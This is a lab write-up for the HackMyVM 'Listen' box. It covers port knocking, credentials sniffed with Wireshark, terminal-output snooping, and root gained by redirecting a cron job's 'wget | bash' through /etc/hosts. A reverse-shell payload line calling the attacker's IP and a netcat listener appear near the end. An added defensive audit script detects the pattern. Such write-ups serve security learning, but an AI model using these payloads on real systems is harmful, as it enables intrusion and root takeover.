
HMV-Listen

HMV-Listen lab write-up
I originally wanted to do the Vulnyx Listen box first, but I could not change its IP with my usual method, so I could not do it.

Port scanning

```
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.158
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 10:13 CST
Nmap scan report for 192.168.179.158 (192.168.179.158)
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 56:6C:79:7A:84:65 (Unknown)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 2.22 ms 192.168.179.158 (192.168.179.158)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.20 seconds
```

Web enumeration

The web home page gives nothing useful; it only redirects to a default cPanel-style placeholder page.

```
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.169.179.158
<html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
```

Before starting, the group owner hinted that the name "Listen" means listening to traffic, so I used Wireshark.
When I opened Wireshark and started capturing directly it complained about insufficient permissions; after a search I launched it with sudo (on macOS).

```
(base) kakeru@bogon /Applications % sudo /Applications/Wireshark.app/Contents/MacOS/Wireshark
```


After capturing, I filtered on the target's IP and looked at the packet contents: one packet says that port 1337 has to be knocked. The box uses the knockd service, and I had to edit its configuration.
Because I could not obtain an IP before boot, I had changed the target's network interface, so the knockd configuration had to be changed as well; it lives in /etc/knockd.conf.

Another packet gave a username and a password.
After knocking on that port, the target's ports 22 and 80 were both open.

```
┌──(root㉿kakeru)-[~/tmp]
└─# knock 192.168.179.158 1337 -v
hitting tcp 192.168.179.158:1337

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -p- 192.168.179.158
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 10:29 CST
Nmap scan report for 192.168.179.158 (192.168.179.158)
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 56:6C:79:7A:84:65 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.77 seconds
```

With those credentials I could then log in over SSH as the silence user.

Privilege escalation

silence has no sudo rights.
Among the SUID files, however, there is one in the home directory of the user leo.

```
silence@listen:~$ find / -perm -4000 -user root -print 2>/dev/null
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/home/leo/poem
silence@listen:~$ cd /home
silence@listen:/home$ ls
leo listen silence
```

```
silence@listen:/home$ cd silence/
silence@listen:~$ ls
listen.sh note.txt
silence@listen:~$ listen.sh
-bash: listen.sh: command not found
silence@listen:~$ cat note.txt
"listen" told me that if I listen, I will hear his password....
```

The note hints that by "listening" to the user listen, we can get his password.

```
silence@listen:~$ cat listen.sh
#!/bin/sh
cat /home/listen/password.txt > /dev/pts/4
```

Running this script would reveal the password, but we have no execute permission on it right now, only read.
I got stuck here for a while and checked a walkthrough: pts/4 is a terminal window, so open four terminal windows and the output shows up in the fourth one.
This must be a scheduled task; wait a while and the password appears in the fourth terminal window (open four SSH sessions, all logged in as silence).

```
silence@listen:~$ su - listen
Password:
listen@listen:~$
```

Successfully switched to listen.
There is a script in the home directory, and pspy64 shows that root runs this listentome.sh on a schedule.

```
listen@listen:~$ ls
listentome.sh password.txt user.txt
listen@listen:~$ cat listentome.sh
wget -O - -q http://listen/ihearyou.sh | bash


2025/02/07 22:14:02 CMD: UID=0 PID=1070 | sh /home/listen/listentome.sh
2025/02/07 22:14:02 CMD: UID=0 PID=1071 | sh /home/listen/listentome.sh
```

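The root cause here is worth spelling out from the defender's side: a root cron job fetches a script over plain HTTP by hostname and pipes it straight into bash, and the hostname is resolved through /etc/hosts, which a low-privileged user can influence. The shell script below is an added example (not part of the original write-up or of the box) that audits for exactly this pattern: it flags scripts that pipe a curl/wget download into a shell and reports whether the download host is pinned in a hosts file. The sample script and hosts file it checks are constructed copies of what the write-up shows, written to a temporary directory so the check runs offline; the function names are my own.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Audits shell scripts for "download | shell" one-liners and checks whether
# the host they download from is overridden in a hosts file. Sample inputs
# below are constructed from the values shown in the write-up.

# find_pipe_to_shell FILE
# Prints each line (with line number) of FILE that runs curl/wget and pipes
# the result into sh, bash, dash or zsh. Prints nothing if there is no match.
find_pipe_to_shell() {
    grep -En '(^|[^[:alnum:]_])(curl|wget)[^|]*[|][[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$1" || true
}

# extract_host LINE
# Prints the host part of the first http(s):// URL found in LINE.
extract_host() {
    printf '%s\n' "$1" | sed -nE 's#.*https?://([^/[:space:]]+).*#\1#p'
}

# hosts_override HOSTNAME HOSTSFILE
# Prints the address HOSTSFILE maps HOSTNAME to, or nothing if it is absent.
# Comment lines are skipped; any alias column on a line may match.
hosts_override() {
    awk -v h="$1" '$1 !~ /^#/ { for (i = 2; i <= NF; i++) if ($i == h) { print $1; exit } }' "$2"
}

# audit_script SCRIPT HOSTSFILE
# Returns 0 and prints a finding when SCRIPT pipes a download into a shell
# AND the download host is pinned in HOSTSFILE (so whoever can edit that
# file controls what the script executes). Returns 1 otherwise.
audit_script() {
    local line host addr
    line=$(find_pipe_to_shell "$1" | head -n 1)
    [ -n "$line" ] || return 1
    host=$(extract_host "$line")
    addr=$(hosts_override "$host" "$2")
    [ -n "$addr" ] || return 1
    printf 'FINDING: %s pipes a download from "%s" into a shell; hosts file pins "%s" to %s\n' \
        "$1" "$host" "$host" "$addr"
}

# ---- constructed sample data (values taken from the write-up) ------------
demo_dir=$(mktemp -d)
cat > "$demo_dir/listentome.sh" <<'EOF'
wget -O - -q http://listen/ihearyou.sh | bash
EOF
cat > "$demo_dir/hosts" <<'EOF'
127.0.0.1 localhost
192.168.179.11 listen
EOF

# Run the audit on the sample; on the box this would be the cron'd script
# and the real /etc/hosts.
audit_script "$demo_dir/listentome.sh" "$demo_dir/hosts"
```

On a real system you would point `audit_script` at each script referenced from /etc/crontab, /etc/cron.d and the root crontab, together with /etc/hosts; a finding means the script's behaviour depends on a name that local configuration can redirect. The mitigations are the usual ones: fetch over HTTPS with certificate validation, verify a signature or hash before executing, keep /etc/hosts root-owned with mode 0644, and avoid running a cron job from a file that a non-root user owns.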
That immediately suggests an approach: edit the hosts file so that listen points at our own machine's HTTP server, and let the target execute a reverse-shell script from there.

```
127.0.0.1 localhost
192.168.179.11 listen

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

Save in nano with Ctrl+O, Enter, then exit with Ctrl+X.

```
┌──(root㉿kakeru)-[~/tmp]
└─# rm ihearyou.sh

┌──(root㉿kakeru)-[~/tmp]
└─# touch ihearyou.sh

┌──(root㉿kakeru)-[~/tmp]
└─# cp reverse.sh ihearyou.sh

┌──(root㉿kakeru)-[~/tmp]
└─# cat ihearyou.sh
bash -i >& /dev/tcp/192.168.179.11/1234 0>&1

┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Then start a listener in another Kali terminal.

```
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
bash: cannot set terminal process group (1123): Inappropriate ioctl for device
bash: no job control in this shell
root@listen:~# id
uid=0(root) gid=0(root) groups=0(root)
root@listen:~#
```

Done.